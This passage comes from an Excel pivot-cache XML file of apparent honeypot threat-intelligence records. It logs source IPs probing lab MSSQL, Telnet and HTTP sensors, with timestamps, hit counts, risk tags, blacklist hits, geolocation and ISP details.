    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6adb:f410"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3143"/>
    <x v="3143"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:53:10"/>
    <d v="2025-04-04T15:51:16"/>
    <d v="2025-04-04T15:53:10"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="NA"/>
    <s v="12.9719"/>
    <s v="77.5937"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS (Karnataka)"/>
    <s v="2006-12-19"/>
    <s v="ABTS-KK-DSL-9102-blr"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aab:1523"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3144"/>
    <x v="3144"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:52:35"/>
    <d v="2025-04-02T13:40:22"/>
    <d v="2025-04-04T15:52:35"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H28"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'spamsources.fabel.dk': ['unknown']}"/>
    <n v="37"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Na"/>
    <s v="Bang Na"/>
    <s v="1620755"/>
    <s v="NA"/>
    <s v="13.6674"/>
    <s v="100.642"/>
    <s v="133481"/>
    <s v="ADVANCED WIRELESS NETWORK COMPANY LIMITED"/>
    <s v="AIS-Fibre"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2001-11-01"/>
    <s v="TH-AIS-Fibre"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b852:d6ff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3145"/>
    <x v="3145"/>
    <s v="188-115-146-67.broadband.tenet.odessa.ua&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:19:30"/>
    <d v="2025-04-04T11:33:59"/>
    <d v="2025-04-04T15:19:30"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="51"/>
    <s v="Odesa"/>
    <s v="Odeskyi Raion"/>
    <s v="Odesa"/>
    <s v="698740"/>
    <s v="65001"/>
    <s v="46.4857"/>
    <s v="30.7438"/>
    <s v="6876"/>
    <s v="TENET Scientific Production Enterprise LLC"/>
    <s v="TeNeT Networking Centre"/>
    <s v="business"/>
    <s v="TeNeT Telecommunication Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bc73:9243"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3146"/>
    <x v="3146"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:16:18"/>
    <d v="2025-04-04T15:13:56"/>
    <d v="2025-04-04T15:16:18"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b60:c880"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3147"/>
    <x v="3147"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:14:43"/>
    <d v="2025-04-04T15:14:43"/>
    <d v="2025-04-04T15:14:43"/>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5:a29c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3148"/>
    <x v="3148"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:08:15"/>
    <d v="2024-04-22T06:40:49"/>
    <d v="2025-04-04T15:08:15"/>
    <n v="233"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H13"/>
    <s v="1433&amp;&amp;22"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AR"/>
    <s v="Arunachal Pradesh"/>
    <s v="East Kameng"/>
    <s v="Seppa"/>
    <s v="12524323"/>
    <s v="790102"/>
    <s v="27.361"/>
    <s v="93.0393"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="business"/>
    <s v="Swiftmail Communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7abb:9aee"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3149"/>
    <x v="3149"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:04:46"/>
    <d v="2025-04-04T15:03:33"/>
    <d v="2025-04-04T15:04:46"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Coimbatore"/>
    <s v="Coimbatore (Balaji Nagar)"/>
    <s v="1273865"/>
    <s v="641018"/>
    <s v="11.0223"/>
    <s v="76.9797"/>
    <s v="45284"/>
    <s v="Wireline Solution India Pvt Ltd."/>
    <s v="WLSNET"/>
    <s v="cellular"/>
    <s v="Wireless Solution India Pvt Ltd."/>
    <s v="2010-10-21"/>
    <s v="WLSNET-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79c8:3354"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3150"/>
    <x v="3150"/>
    <s v="122-116-175-245.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:01:30"/>
    <d v="2023-08-10T15:20:00"/>
    <d v="2025-04-04T15:01:30"/>
    <n v="1438"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;11467&amp;&amp;23&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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:aff5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3151"/>
    <x v="3151"/>
    <s v="NA&amp;&amp;125-228-215-103.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T15:01:26"/>
    <d v="2024-12-15T18:22:26"/>
    <d v="2025-04-04T15:01:26"/>
    <n v="776"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7de4:d767"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3152"/>
    <x v="3152"/>
    <s v="61-222-88-227.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:00:59"/>
    <d v="2023-07-28T11:49:56"/>
    <d v="2025-04-04T15:00:59"/>
    <n v="1320"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;443&amp;&amp;51200&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3dde:58e3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3153"/>
    <x v="3153"/>
    <s v="NA&amp;&amp;118-170-39-165.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T14:50:17"/>
    <d v="2025-04-04T09:44:02"/>
    <d v="2025-04-04T14:50:17"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3"/>
    <s v="23"/>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2007-10-04"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:76aa:27a5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3154"/>
    <x v="3154"/>
    <s v="h-178-174-163-136.A192.priv.bahnhof.se"/>
    <x v="0"/>
    <d v="2025-04-04T14:29:42"/>
    <d v="2025-04-04T06:16:55"/>
    <d v="2025-04-04T14:29:42"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="G"/>
    <s v="Kronoberg"/>
    <s v="Växjö Municipality"/>
    <s v="Vaxjo"/>
    <s v="2663536"/>
    <s v="352 74"/>
    <s v="56.879"/>
    <s v="14.8059"/>
    <s v="8473"/>
    <s v="Bahnhof AB"/>
    <s v="Bahnhof AB"/>
    <s v="business"/>
    <s v="General Private"/>
    <s v="2010-04-28"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2006-02-08 00:00:00"/>
    <s v="2026-02-08 00:00:00"/>
    <s v="2025-02-03 00:00:00"/>
    <s v="['ns2.bahnhof.se 212.85.64.4', 'ns.bahnhof.se 195.178.160.1']"/>
    <s v="Ascio"/>
    <s v="ok"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2ae:a388"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3155"/>
    <x v="3155"/>
    <s v="122-117-92-92.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T14:29:34"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-04T14:29:34"/>
    <n v="287"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_DNS_H46&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23&amp;&amp;53&amp;&amp;58691&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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:5c5c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3156"/>
    <x v="3156"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T14:14:21"/>
    <d v="2025-04-04T14:14:21"/>
    <d v="2025-04-04T14:14:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:54ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3157"/>
    <x v="3157"/>
    <s v="NA&amp;&amp;220-135-63-139.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T14:00:55"/>
    <d v="2024-12-24T11:35:49"/>
    <d v="2025-04-04T14:00:55"/>
    <n v="389"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
